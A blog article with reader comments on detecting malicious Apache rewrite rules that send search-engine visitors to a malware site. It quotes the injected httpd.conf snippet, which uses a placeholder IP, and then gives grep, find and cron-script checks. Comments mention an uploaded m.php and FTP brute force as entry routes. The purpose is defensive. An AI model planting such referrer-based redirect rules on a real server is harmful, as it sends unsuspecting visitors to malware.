|
|
How can people hack my Apache server with Rewrite rules?A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server? This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus. Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google... Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself. A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code: RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L] Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good! But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see: $ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L] RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L] Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file. One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about): #!/bin/sh
conf=/usr/local/apache/conf/httpd.conf grep -i rewriterule $conf | grep http: | grep -v feedburner exit 0 Easy enough, right? Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file. You can check for this from the command line again: $ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this: AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null AuthName "Growing Your Biz w/ Google Course" AuthType Basic <Limit GET> require user taylor require user google require user steven </Limit> (You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess) Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time: $ grep http: $(find . -name ".htaccess" -print)
$ Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above. Hope that helps you out! Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.
More Useful Blogs and Blogging Articles:
✔ Get my shopping cart plugin to work with WordPress?
We've put in a shopping cart for a client that's not working, and we need some help! The cart is currently using the...
✔ Embed an audio player on a blog or web page?I have some mp3 audio files I've recorded and would like to have people who visit my site be able to listen to...
✔ Can I write a guest review for AskDaveTaylor.com?Hi Dave. I'm a big fan of your site and love that you're doing so many reviews now. I've noticed, however, that there...
✔ Change author on WordPress blog post?I have two accounts set up for my WordPress blog and I'd like to be able to have all my posts from a...
✔ How do I restructure my Wordpress blog without losing SEO?I have a wordpress blog that was using categories in the url structure like this: /category_name/post_name/ Then I had read somewhere that if...
Let's stay in touch!
Sign up for my weekly AskDaveTaylor Newsletter and you'll receive even more tech and gadget help
right to your inbox, along with exclusive news and industry updates. It's good stuff. I promise!
Categorized:
Blogs and Blogging
(Article 8450,
Written by Dave Taylor)
Tagged: apache, hacking, http.conf, site hijacking Previous: What is eBay auction fever? Next: How can I wipe my old Apple iPhone clean of data? Reader Comments To Date: 8Dave Cole said, on August 21, 2008 8:32 AM:
I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks. Greg said, on November 18, 2008 1:37 PM:
I add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server? Dardar said, on December 17, 2008 2:49 PM:
CAn anybody tell me why I can no longer get to www.youtube.com? Instead I get UK.youtube.com, and also many other google searches where the search gives normal websites, homepages, etc. as answers, when I click on them in Google search, I'm instead sent to some "parked" looking spammy type web pages. Is this my Google/local computer with a malware problem or is it the websites? I can't believe youtube (usa) has this problem but I sure can't reach it. Something to do with Hosts file? Don't know what that is... please feel free to email me or respond here. Thanks Dardar Johann said, on January 29, 2009 4:58 PM:
Thanks for posting this! I was scratching my head wondering how Google could be hacked and why only for my site. This information was a lifesaver! help said, on February 11, 2009 4:24 PM:
I've been dealing a lot with this type of hack. Now it seems that the directory permissions are being changed to 777 when the htaccess file is uploaded. It seems they are uploading a file called m.php: This file renames a blank file called htt to .htaccess. Khalid said, on January 6, 2010 11:58 PM:
This is a nice explanation - many thanks! But like a few others who said the same thing, I'm wondering HOW someone could actually place a file when they don't have a valid password... Thank you for your time! Mark said, on April 14, 2011 6:10 PM:
Just in case anyone else stumbles across this again, we just had the same thing happen to our site. Turns out the intruder used a brute force attack to gain access to ftp (we noticed access attemps in the ftp logs dating back 6 months). Once in, an .htaccess file was dropped into every directory, not just root.
I do have a comment, now that you mention it!Check This Out Too... |
Recent Entries
Look for Answers
Recommended
All Our Categories
Apple iPad Help
Articles and Reviews Auctions and Online Shopping Blogs and Blogging Building Web Site Traffic Business and Management Computer and Internet Basics d) None of the Above Facebook Help Google Gmail Help Google Plus Help HTML, JavaScript and Web Site Programming Industry News and Trade Shows iPhone and Cell Phone Help iPod, Sony PSP and MP3 Player Help Kindle Fire Help Mac OS X Help Pay Per Click (PPC) Advertising Pinterest Help Search Engine Optimization (SEO) Shell Script Programming Tech Support Video Help The Writing Business Twitter, LinkedIn and Social Network Help Unix and Linux Help Video Game Tips and Help Windows PC Help Find Me on Google+ ADT on G+ |
Hi Dave,
Great article - thanks.
I've recently seen this popping up in .htaccess files. Do you have any info or links regarding what exploits people are using to do this in the first place?